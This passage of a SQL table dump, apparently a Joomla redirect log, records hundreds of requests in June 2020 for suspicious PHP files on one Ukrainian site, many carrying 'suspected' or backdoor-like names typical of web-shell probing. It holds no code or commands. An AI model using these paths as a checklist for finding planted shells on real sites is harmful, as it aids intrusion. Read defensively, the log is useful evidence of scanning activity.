16:00:25','0000-00-00 00:00:00',301),(17044,'https://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/langs/feter.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:00:25','0000-00-00 00:00:00',301),(17045,'https://ekvatorprint.com.ua/libraries/joomla/base/wp-seca.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:02:51','0000-00-00 00:00:00',301),(17046,'https://ekvatorprint.com.ua/libraries/phpmailer/language/mark.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 16:03:13','0000-00-00 00:00:00',301),(17047,'https://ekvatorprint.com.ua/libraries/legacy/error/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:04:33','0000-00-00 00:00:00',301),(17048,'https://ekvatorprint.com.ua/libraries/simplepie/hoz.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:26:01','0000-00-00 00:00:00',301),(17049,'https://ekvatorprint.com.ua/libraries/pear/archive_tar/index2.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:31:10','0000-00-00 00:00:00',301),(17050,'https://ekvatorprint.com.ua/lkunge.php',NULL,'http://site.ru','',2,0,'2020-06-27 16:33:26','0000-00-00 00:00:00',301),(17051,'https://ekvatorprint.com.ua/media/system/images/moorainbow/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:34:32','0000-00-00 00:00:00',301),(17052,'https://ekvatorprint.com.ua/ollx.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 16:54:15','0000-00-00 00:00:00',301),(17053,'https://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/directionality/feter.php',NULL,'http://site.ru','',1,0,'2020-06-27 17:06:05','0000-00-00 00:00:00',301),(17054,'https://ekvatorprint.com.ua/libraries/phpmailer/language/feal.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 17:33:46','0000-00-00 00:00:00',301),(17055,'https://ekvatorprint.com.ua/lpeziy.php',NULL,'http://site.ru','',1,0,'2020-06-27 17:35:39','0000-00-00 00:00:00',301),(17056,'https://ekvatorprint.com.ua/templates/beez3/o.php',NULL,'http://site.ru','',2,0,'2020-06-27 17:37:46','0000-00-00 00:00:00',301),(17057,'https://ekvatorprint.com.ua/libraries/fof/integration/joomla/filesystem/data.php',NULL,'http://site.ru','',2,0,'2020-06-27 17:39:34','0000-00-00 00:00:00',301),(17058,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/paste/settings.php',NULL,'http://site.ru','',1,0,'2020-06-27 18:03:49','0000-00-00 00:00:00',301),(17059,'https://ekvatorprint.com.ua/libraries/joomla/html/parameter/element/thumb.php',NULL,'http://site.ru','',1,0,'2020-06-27 18:04:42','0000-00-00 00:00:00',301),(17060,'https://ekvatorprint.com.ua/templates/beez3/html/layouts/joomla/system/wp-img.php',NULL,'http://site.ru','',1,0,'2020-06-27 18:06:15','0000-00-00 00:00:00',301),(17061,'https://ekvatorprint.com.ua/includes/search.class.php',NULL,'http://site.ru','',1,0,'2020-06-27 18:08:22','0000-00-00 00:00:00',301),(17062,'https://ekvatorprint.com.ua/plugins/finder/categories/ob.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-27 18:34:34','0000-00-00 00:00:00',301),(17063,'https://ekvatorprint.com.ua/libraries/joomla/crypt/data.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-27 18:55:41','0000-00-00 00:00:00',301),(17064,'https://ekvatorprint.com.ua/tmp/install_4ffcb135841c9/hu-hu/apps/blog/language/wp-block.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:16:19','0000-00-00 00:00:00',301),(17065,'https://ekvatorprint.com.ua/templates/beez_20/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-27 19:19:41','0000-00-00 00:00:00',301),(17066,'https://ekvatorprint.com.ua/libraries/legacy/error/xmlsrpc.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:22:58','0000-00-00 00:00:00',301),(17067,'https://ekvatorprint.com.ua/libraries/phpmailer/index.htmly.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:35:25','0000-00-00 00:00:00',301),(17068,'https://ekvatorprint.com.ua/templates/beez5/html/html5.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:44:37','0000-00-00 00:00:00',301),(17069,'https://ekvatorprint.com.ua/xnx.php',NULL,'http://site.ru','',2,0,'2020-06-27 19:48:47','0000-00-00 00:00:00',301),(17070,'https://ekvatorprint.com.ua/includes/freedoms.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:55:07','0000-00-00 00:00:00',301),(17071,'https://ekvatorprint.com.ua/testspan.kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',3,0,'2020-06-27 19:56:26','0000-00-00 00:00:00',301),(17072,'https://ekvatorprint.com.ua/myshop.kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',1,0,'2020-06-27 20:29:20','0000-00-00 00:00:00',301),(17073,'https://ekvatorprint.com.ua/old/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-27 21:20:45','0000-00-00 00:00:00',301),(17074,'https://ekvatorprint.com.ua/modules/languages.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:20:47','0000-00-00 00:00:00',301),(17075,'https://ekvatorprint.com.ua/log/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:21:12','0000-00-00 00:00:00',301),(17076,'https://ekvatorprint.com.ua/plugins/editors/codemirror/layouts/editors/codemirror/theme.php',NULL,'http://site.ru','',2,0,'2020-06-27 21:25:33','0000-00-00 00:00:00',301),(17077,'https://ekvatorprint.com.ua/media/wp-type.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:47:03','0000-00-00 00:00:00',301),(17078,'https://ekvatorprint.com.ua/libraries/fof/utils/installscript/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-27 21:49:21','0000-00-00 00:00:00',301),(17079,'https://ekvatorprint.com.ua/media/com_contenthistory/js/data.php',NULL,'http://site.ru','',2,0,'2020-06-27 21:51:18','0000-00-00 00:00:00',301),(17080,'https://ekvatorprint.com.ua/media/editors/codemirror/mode/vhdl/admin-class.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:52:17','0000-00-00 00:00:00',301),(17081,'https://ekvatorprint.com.ua/libraries/joomla/template/k.php',NULL,'http://site.ru','',2,0,'2020-06-27 21:54:55','0000-00-00 00:00:00',301),(17082,'https://ekvatorprint.com.ua/templates/beez3/html/mod_login/gank.php.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 21:57:59','0000-00-00 00:00:00',301),(17083,'https://ekvatorprint.com.ua/kopia/en/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',1,0,'2020-06-27 22:11:27','0000-00-00 00:00:00',301),(17084,'https://ekvatorprint.com.ua/templates/protostar/doc.php',NULL,'http://site.ru','',2,0,'2020-06-27 22:21:52','0000-00-00 00:00:00',301),(17085,'https://ekvatorprint.com.ua/libraries/openid/auth/hell.php',NULL,'http://site.ru','',1,0,'2020-06-27 22:22:01','0000-00-00 00:00:00',301),(17086,'https://ekvatorprint.com.ua/templates/protostar/js/.h..php',NULL,'http://site.ru','',3,0,'2020-06-27 22:47:02','0000-00-00 00:00:00',301),(17087,'https://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/.h..php',NULL,'http://site.ru','',1,0,'2020-06-27 22:47:51','0000-00-00 00:00:00',301),(17088,'https://ekvatorprint.com.ua/libraries/legacy/simplecrypt/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-27 22:50:17','0000-00-00 00:00:00',301),(17089,'https://ekvatorprint.com.ua/media/cred.php',NULL,'http://site.ru','',2,0,'2020-06-27 23:14:44','0000-00-00 00:00:00',301),(17090,'https://ekvatorprint.com.ua/nsgin.com/cache/simple.php5',NULL,'http://site.ru','',1,0,'2020-06-27 23:15:49','0000-00-00 00:00:00',301),(17091,'https://ekvatorprint.com.ua/layouts/joomla/content/icons/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-27 23:44:25','0000-00-00 00:00:00',301),(17092,'https://ekvatorprint.com.ua/includes/tp4hh42p.php',NULL,'http://site.ru','',2,0,'2020-06-27 23:52:52','0000-00-00 00:00:00',301),(17093,'https://ekvatorprint.com.ua/modules/mod_fxprev/libraries/ruf.php5',NULL,'http://site.ru','',1,0,'2020-06-28 00:07:37','0000-00-00 00:00:00',301),(17094,'https://ekvatorprint.com.ua/libraries/openid/auth/feter.php',NULL,'http://site.ru','',1,0,'2020-06-28 00:11:03','0000-00-00 00:00:00',301),(17095,'https://ekvatorprint.com.ua/kdbzap.php',NULL,'http://site.ru','',1,0,'2020-06-28 00:13:44','0000-00-00 00:00:00',301),(17096,'https://ekvatorprint.com.ua/libraries/phputf8/utils/wp-side.php',NULL,'http://site.ru','',1,0,'2020-06-28 04:19:12','0000-00-00 00:00:00',301),(17097,'https://ekvatorprint.com.ua/includes/xmlrpc.php',NULL,'http://site.ru','',2,0,'2020-06-28 04:51:56','0000-00-00 00:00:00',301),(17098,'https://ekvatorprint.com.ua/www/argo/tmp/config.php',NULL,'http://site.ru','',3,0,'2020-06-28 04:54:07','0000-00-00 00:00:00',301),(17099,'https://ekvatorprint.com.ua/iomsiiyyta.php',NULL,'http://site.ru','',1,0,'2020-06-28 04:54:26','0000-00-00 00:00:00',301),(17100,'https://ekvatorprint.com.ua/libraries/cms/response/media-admin.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 05:18:04','0000-00-00 00:00:00',301),(17101,'https://ekvatorprint.com.ua/libraries/joomla/template/module/modifier/feal.php',NULL,'http://site.ru','',2,0,'2020-06-28 05:19:16','0000-00-00 00:00:00',301),(17102,'https://ekvatorprint.com.ua/templates/beez3/images/personal/streamed.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 05:20:55','0000-00-00 00:00:00',301),(17103,'https://ekvatorprint.com.ua/plugins/captcha/.h..php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 05:23:16','0000-00-00 00:00:00',301),(17104,'https://ekvatorprint.com.ua/tmp/install_4ffcb135841c9/sv-se/jhwtxu.php',NULL,'http://site.ru','',1,0,'2020-06-28 05:24:48','0000-00-00 00:00:00',301),(17105,'https://ekvatorprint.com.ua/tmp/install_505b916e48aa2/el-gr/apps/page/language/wp-update.php',NULL,'http://site.ru','',2,0,'2020-06-28 05:27:50','0000-00-00 00:00:00',301),(17106,'https://ekvatorprint.com.ua/modules/go.php',NULL,'http://site.ru','',2,0,'2020-06-28 05:30:43','0000-00-00 00:00:00',301),(17107,'https://ekvatorprint.com.ua/test2.php',NULL,'http://site.ru','',2,0,'2020-06-28 05:47:10','0000-00-00 00:00:00',301),(17108,'https://ekvatorprint.com.ua/oldversionbct/doc.php',NULL,'http://site.ru','',2,0,'2020-06-28 05:49:53','0000-00-00 00:00:00',301),(17109,'https://ekvatorprint.com.ua/tmp/404.php',NULL,'http://site.ru','',3,0,'2020-06-28 06:12:43','0000-00-00 00:00:00',301),(17110,'https://ekvatorprint.com.ua/libraries/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:13:39','0000-00-00 00:00:00',301),(17111,'https://ekvatorprint.com.ua/options/wsa.php',NULL,'http://site.ru','',2,0,'2020-06-28 06:15:07','0000-00-00 00:00:00',301),(17112,'https://ekvatorprint.com.ua/tmp/com_csvi/bag.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:29:07','0000-00-00 00:00:00',301),(17113,'https://ekvatorprint.com.ua/libraries/fof/toolbar/feal.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:47:19','0000-00-00 00:00:00',301),(17114,'https://ekvatorprint.com.ua/modules/mod_articles_news/tmpl/gank.php.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 06:53:39','0000-00-00 00:00:00',301),(17115,'https://ekvatorprint.com.ua/libraries/fof/autoloader/home.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 06:54:37','0000-00-00 00:00:00',301),(17116,'https://ekvatorprint.com.ua/templates/protostar/less/.h..php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 07:17:49','0000-00-00 00:00:00',301),(17117,'https://ekvatorprint.com.ua/o.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 07:32:16','0000-00-00 00:00:00',301),(17118,'https://ekvatorprint.com.ua/media/media/simpleside.php5',NULL,'http://site.ru','',2,0,'2020-06-28 07:33:27','0000-00-00 00:00:00',301),(17119,'https://ekvatorprint.com.ua/libraries/phpass/wp-side.php',NULL,'http://site.ru','',2,0,'2020-06-28 07:51:56','0000-00-00 00:00:00',301),(17120,'https://ekvatorprint.com.ua/libraries/pattemplate/.h..php',NULL,'http://site.ru','',1,0,'2020-06-28 07:57:08','0000-00-00 00:00:00',301),(17121,'https://ekvatorprint.com.ua/tmp/install_5eb717fa1faba/mod_slidethemall_joomla3/doc.php',NULL,'http://site.ru','',3,0,'2020-06-28 08:17:12','0000-00-00 00:00:00',301),(17122,'https://ekvatorprint.com.ua/test/maint/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-28 08:20:22','0000-00-00 00:00:00',301),(17123,'https://ekvatorprint.com.ua/nsgin.com/cache/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-28 08:22:50','0000-00-00 00:00:00',301),(17124,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/visualblocks/css/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 08:23:11','0000-00-00 00:00:00',301),(17125,'https://ekvatorprint.com.ua/modules/mod_activesynmasterkey/doc.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 09:15:40','0000-00-00 00:00:00',301),(17126,'https://ekvatorprint.com.ua/language/en-gb/en-gb.mod_door.php',NULL,'http://site.ru','',1,0,'2020-06-28 09:51:55','0000-00-00 00:00:00',301),(17127,'https://ekvatorprint.com.ua/logs/logs.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 09:59:04','0000-00-00 00:00:00',301),(17128,'https://ekvatorprint.com.ua/libraries/fof/utils/installscript/feal.php',NULL,'http://site.ru','',1,0,'2020-06-28 10:05:50','0000-00-00 00:00:00',301),(17129,'https://ekvatorprint.com.ua/libraries/0p0b8xpt.php',NULL,'http://site.ru','',1,0,'2020-06-28 10:19:31','0000-00-00 00:00:00',301),(17130,'https://ekvatorprint.com.ua/libraries/cms/pagination/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-28 10:57:11','0000-00-00 00:00:00',301),(17131,'https://ekvatorprint.com.ua/libraries/cms/schema/changeitem/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 10:58:14','0000-00-00 00:00:00',301),(17132,'https://ekvatorprint.com.ua/media/com_contact/js/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 11:03:28','0000-00-00 00:00:00',301),(17133,'https://ekvatorprint.com.ua/media/media/css/sec.php',NULL,'http://site.ru','',1,0,'2020-06-28 11:04:04','0000-00-00 00:00:00',301),(17134,'https://ekvatorprint.com.ua/modules/mod_articles_categories/tmpl/wp-side.php',NULL,'http://site.ru','',1,0,'2020-06-28 11:28:16','0000-00-00 00:00:00',301),(17135,'https://ekvatorprint.com.ua/templates/beez3/images/system/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 11:29:36','0000-00-00 00:00:00',301),(17136,'https://ekvatorprint.com.ua/libraries/domit/wp-logos.php',NULL,'http://site.ru','',1,0,'2020-06-28 11:32:50','0000-00-00 00:00:00',301),(17137,'https://ekvatorprint.com.ua/media/system/css/mini.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 11:37:30','0000-00-00 00:00:00',301),(17138,'https://ekvatorprint.com.ua/libraries/cms/installer/manifest/.h..php',NULL,'http://site.ru','',1,0,'2020-06-28 12:01:14','0000-00-00 00:00:00',301),(17139,'https://ekvatorprint.com.ua/libraries/404.php',NULL,'http://site.ru','',4,0,'2020-06-28 12:30:52','0000-00-00 00:00:00',301),(17140,'https://ekvatorprint.com.ua/jorda1.php',NULL,'http://site.ru','',2,0,'2020-06-28 13:06:10','0000-00-00 00:00:00',301),(17141,'https://ekvatorprint.com.ua/media/arfat2.php',NULL,'http://site.ru','',1,0,'2020-06-28 13:06:55','0000-00-00 00:00:00',301),(17142,'https://ekvatorprint.com.ua/tmp/simpleside.php5',NULL,'http://site.ru','',2,0,'2020-06-28 13:07:51','0000-00-00 00:00:00',301),(17143,'https://ekvatorprint.com.ua/templates/system/css/class.php',NULL,'http://site.ru','',1,0,'2020-06-28 13:08:52','0000-00-00 00:00:00',301),(17144,'https://ekvatorprint.com.ua/newsletter.kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',2,0,'2020-06-28 13:09:23','0000-00-00 00:00:00',301),(17145,'https://ekvatorprint.com.ua/xmlrpc/includes/includes.php',NULL,'http://site.ru','',4,0,'2020-06-28 13:14:48','0000-00-00 00:00:00',301),(17146,'https://ekvatorprint.com.ua/menus/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-28 13:35:45','0000-00-00 00:00:00',301),(17147,'https://ekvatorprint.com.ua/libraries/joomla/template/123.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-28 13:44:23','0000-00-00 00:00:00',301),(17148,'https://ekvatorprint.com.ua/includes/wp-aespa.php',NULL,'http://site.ru','',4,0,'2020-06-28 14:33:28','0000-00-00 00:00:00',301),(17149,'https://ekvatorprint.com.ua/local.php',NULL,'http://site.ru','',9,0,'2020-06-28 15:08:19','0000-00-00 00:00:00',301),(17150,'https://ekvatorprint.com.ua/templates/beez3/html/layouts/beautifu.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 15:10:04','0000-00-00 00:00:00',301),(17151,'https://ekvatorprint.com.ua/layouts/joomla/html/batch/media-admin.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 15:11:51','0000-00-00 00:00:00',301),(17152,'https://ekvatorprint.com.ua/libraries/joomla/template/popup-pompop.php',NULL,'http://site.ru','',1,0,'2020-06-28 15:11:53','0000-00-00 00:00:00',301),(17153,'https://ekvatorprint.com.ua/nsgin.com/wp-plugins.php',NULL,'http://site.ru','',1,0,'2020-06-28 15:44:12','0000-00-00 00:00:00',301),(17154,'https://ekvatorprint.com.ua/oldversionbct/ajax.php',NULL,'http://site.ru','',3,0,'2020-06-28 16:04:34','0000-00-00 00:00:00',301),(17155,'https://ekvatorprint.com.ua/wp/shx.php',NULL,'http://site.ru','',1,0,'2020-06-28 16:10:10','0000-00-00 00:00:00',301),(17156,'https://ekvatorprint.com.ua/libraries/pear/archive_tar/int123.php',NULL,'http://site.ru','',1,0,'2020-06-28 16:11:28','0000-00-00 00:00:00',301),(17157,'https://ekvatorprint.com.ua/layouts/joomla/system/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-28 16:31:51','0000-00-00 00:00:00',301),(17158,'https://ekvatorprint.com.ua/administrator/components/com_rsform/views/formajax/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-28 17:14:40','0000-00-00 00:00:00',301),(17159,'https://ekvatorprint.com.ua/templates/beez3/html/bag.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 17:15:56','0000-00-00 00:00:00',301),(17160,'https://ekvatorprint.com.ua/qm0dec.php',NULL,'http://site.ru','',2,0,'2020-06-28 17:16:04','0000-00-00 00:00:00',301),(17161,'https://ekvatorprint.com.ua/bin/coredata2274d6t2.php',NULL,'http://site.ru','',2,0,'2020-06-28 17:20:57','0000-00-00 00:00:00',301),(17162,'https://ekvatorprint.com.ua/templates/beez3/doc.php',NULL,'http://site.ru','',2,0,'2020-06-28 17:40:28','0000-00-00 00:00:00',301),(17163,'https://ekvatorprint.com.ua/administrator/profile.php',NULL,'http://site.ru','',1,0,'2020-06-28 17:42:28','0000-00-00 00:00:00',301),(17164,'https://ekvatorprint.com.ua/administrator/components/com_admin/controllers/images.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 17:42:47','0000-00-00 00:00:00',301),(17165,'https://ekvatorprint.com.ua/wp-1login_bac.php',NULL,'http://site.ru','',4,0,'2020-06-28 17:44:56','0000-00-00 00:00:00',301),(17166,'https://ekvatorprint.com.ua/administrator/components/com_finder/helpers/wp-ping.php',NULL,'http://site.ru','',2,0,'2020-06-28 18:08:38','0000-00-00 00:00:00',301),(17167,'https://ekvatorprint.com.ua/weqqglgwwd.php',NULL,'http://site.ru','',1,0,'2020-06-28 18:09:18','0000-00-00 00:00:00',301),(17168,'https://ekvatorprint.com.ua/back/templates/protostar/doc.php',NULL,'http://site.ru','',2,0,'2020-06-28 18:11:03','0000-00-00 00:00:00',301),(17169,'https://ekvatorprint.com.ua/plugins/quickicon/joomlaupdate/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 18:24:13','0000-00-00 00:00:00',301),(17170,'https://ekvatorprint.com.ua/administrator/components/com_redirect/views/links/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-28 18:35:53','0000-00-00 00:00:00',301),(17171,'https://ekvatorprint.com.ua/administrator/templates/isis/html/data.php',NULL,'http://site.ru','',2,0,'2020-06-28 18:41:30','0000-00-00 00:00:00',301),(17172,'https://ekvatorprint.com.ua/wkntqx.php',NULL,'http://site.ru','',1,0,'2020-06-28 19:03:31','0000-00-00 00:00:00',301),(17173,'https://ekvatorprint.com.ua/xmlrpc/robots.txt.php',NULL,'http://site.ru','',1,0,'2020-06-28 19:07:41','0000-00-00 00:00:00',301),(17174,'https://ekvatorprint.com.ua/quarantine_h2144/blackhat.php',NULL,'http://site.ru','',1,0,'2020-06-28 19:29:42','0000-00-00 00:00:00',301),(17175,'https://ekvatorprint.com.ua/administrator/components/components.php',NULL,'http://site.ru','',2,0,'2020-06-28 19:34:47','0000-00-00 00:00:00',301),(17176,'https://ekvatorprint.com.ua/plugins/system/debug/deep.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:00:46','0000-00-00 00:00:00',301),(17177,'https://ekvatorprint.com.ua/templates/ambient/css/ionicons/5e39617b826c6.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:00:50','0000-00-00 00:00:00',301),(17178,'https://ekvatorprint.com.ua/plugins1/editors/tinymce/jscripts/tiny_mce/themes/advanced/langs/feter.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:01:42','0000-00-00 00:00:00',301),(17179,'https://ekvatorprint.com.ua/templates/beez/info.php',NULL,'http://site.ru','',1,0,'2020-06-28 20:08:00','0000-00-00 00:00:00',301),(17180,'https://ekvatorprint.com.ua/plugins/system/jsnframework/assets/3rd-party/jquery-zeroclipboard/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:31:52','0000-00-00 00:00:00',301),(17181,'https://ekvatorprint.com.ua/cache/auto.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:33:33','0000-00-00 00:00:00',301),(17182,'https://ekvatorprint.com.ua/templates/rhuk_milkyway/html/editor.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:46:41','0000-00-00 00:00:00',301),(17183,'https://ekvatorprint.com.ua/bin/bin.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:48:35','0000-00-00 00:00:00',301),(17184,'https://ekvatorprint.com.ua/administrator/modules/mod_imageshow_quickicon/tmpl/.helperty.php',NULL,'http://site.ru','',1,0,'2020-06-28 20:52:16','0000-00-00 00:00:00',301),(17185,'https://ekvatorprint.com.ua/wp-crash.php',NULL,'http://site.ru','',1,0,'2020-06-28 20:56:34','0000-00-00 00:00:00',301),(17186,'https://ekvatorprint.com.ua/templates/beez3/html/com_content/article/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 21:14:47','0000-00-00 00:00:00',301),(17187,'https://ekvatorprint.com.ua/img/img.php',NULL,'http://site.ru','',1,0,'2020-06-28 21:46:41','0000-00-00 00:00:00',301),(17188,'https://ekvatorprint.com.ua/templates/beez3/html/com_content/featured/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 21:48:50','0000-00-00 00:00:00',301),(17189,'https://ekvatorprint.com.ua/public/hebadge_pagebadge/03/5df25d7b826c9.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 21:49:12','0000-00-00 00:00:00',301),(17190,'https://ekvatorprint.com.ua/administrator/components/com_weblinks/controllers/class-wp-filesystemss.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 21:59:58','0000-00-00 00:00:00',301),(17191,'https://ekvatorprint.com.ua/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/directionality/feter.php',NULL,'http://site.ru','',2,0,'2020-06-28 22:15:19','0000-00-00 00:00:00',301),(17192,'https://ekvatorprint.com.ua/plugins/system/helix3/core/configure.php',NULL,'http://site.ru','',1,0,'2020-06-28 22:16:50','0000-00-00 00:00:00',301),(17193,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/views/showcase/tmpl/htaccess.php',NULL,'http://site.ru','',3,0,'2020-06-28 22:23:49','0000-00-00 00:00:00',301),(17194,'https://ekvatorprint.com.ua/wp-dbs.php',NULL,'http://site.ru','',1,0,'2020-06-28 22:27:16','0000-00-00 00:00:00',301),(17195,'https://ekvatorprint.com.ua/zxpcis.php',NULL,'http://site.ru','',2,0,'2020-06-28 22:51:24','0000-00-00 00:00:00',301),(17196,'https://ekvatorprint.com.ua/administrator/tyt.php',NULL,'http://site.ru','',2,0,'2020-06-28 23:14:53','0000-00-00 00:00:00',301),(17197,'https://ekvatorprint.com.ua/templates/beez/wp-muen.php',NULL,'http://site.ru','',1,0,'2020-06-28 23:21:31','0000-00-00 00:00:00',301),(17198,'https://ekvatorprint.com.ua/templates/beez3/html/com_content/categories/wp-side.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 23:43:25','0000-00-00 00:00:00',301),(17199,'https://ekvatorprint.com.ua/templates/ambient/css/font-awesome/bag.php',NULL,'http://site.ru','',1,0,'2020-06-29 00:12:36','0000-00-00 00:00:00',301),(17200,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/libraries/3rd-party/httpclient/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 00:19:14','0000-00-00 00:00:00',301),(17201,'https://ekvatorprint.com.ua/cache/2001981.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 00:27:05','0000-00-00 00:00:00',301),(17202,'https://ekvatorprint.com.ua/ymihympfbq.php',NULL,'http://site.ru','',2,0,'2020-06-29 00:43:31','0000-00-00 00:00:00',301),(17203,'https://ekvatorprint.com.ua/zb.php',NULL,'http://site.ru','',1,0,'2020-06-29 00:46:13','0000-00-00 00:00:00',301),(17204,'https://ekvatorprint.com.ua/administrator/administrator/logs/class-wp-filesystemss.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 00:51:05','0000-00-00 00:00:00',301),(17205,'https://ekvatorprint.com.ua/bin/corecore71.php',NULL,'http://site.ru','',2,0,'2020-06-29 01:08:13','0000-00-00 00:00:00',301),(17206,'https://ekvatorprint.com.ua/templates/beez3/html/com_content/form/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 01:09:20','0000-00-00 00:00:00',301),(17207,'https://ekvatorprint.com.ua/administrator/components/com_acepolls/views/votes/media-admin.php',NULL,'http://site.ru','',3,0,'2020-06-29 01:10:17','0000-00-00 00:00:00',301),(17208,'https://ekvatorprint.com.ua/administrator/templates/hathor/html/mod_quickicon/data.php',NULL,'http://site.ru','',2,0,'2020-06-29 01:10:53','0000-00-00 00:00:00',301),(17209,'https://ekvatorprint.com.ua/plugins/system/languagecode/language/en-gb/wp-side.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 01:14:45','0000-00-00 00:00:00',301),(17210,'https://ekvatorprint.com.ua/administrator/components/com_installer/views/install/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-29 01:29:54','0000-00-00 00:00:00',301),(17211,'https://ekvatorprint.com.ua/xxxx.php',NULL,'http://site.ru','',3,0,'2020-06-29 01:34:12','0000-00-00 00:00:00',301),(17212,'https://ekvatorprint.com.ua/alfa3.php',NULL,'http://site.ru','',1,0,'2020-06-29 01:38:16','0000-00-00 00:00:00',301),(17213,'https://ekvatorprint.com.ua/quarantine_h2144/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 02:09:13','0000-00-00 00:00:00',301),(17214,'https://ekvatorprint.com.ua/administrator/modules/mod_login/index.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 02:29:28','0000-00-00 00:00:00',301),(17215,'https://ekvatorprint.com.ua/administrator/components/com_phocagallery/views/phocagalleryraimg/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 02:51:53','0000-00-00 00:00:00',301),(17216,'https://ekvatorprint.com.ua/_media/sitemps.php',NULL,'http://site.ru','',1,0,'2020-06-29 03:07:34','0000-00-00 00:00:00',301),(17217,'https://ekvatorprint.com.ua/plugins/system/jsnframework/libraries/joomlashine/plugin/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-29 03:16:08','0000-00-00 00:00:00',301),(17218,'https://ekvatorprint.com.ua/blnvqechaa.php',NULL,'http://site.ru','',1,0,'2020-06-29 03:19:30','0000-00-00 00:00:00',301),(17219,'https://ekvatorprint.com.ua/poub/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87.php',NULL,'http://site.ru','',4,0,'2020-06-29 03:49:25','0000-00-00 00:00:00',301),(17220,'https://ekvatorprint.com.ua/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/emotions/ob.php',NULL,'http://site.ru','',1,0,'2020-06-29 03:50:08','0000-00-00 00:00:00',301),(17221,'https://ekvatorprint.com.ua/small.php',NULL,'http://site.ru','',6,0,'2020-06-29 03:50:58','0000-00-00 00:00:00',301),(17222,'https://ekvatorprint.com.ua/ajax.php',NULL,'http://site.ru','',3,0,'2020-06-29 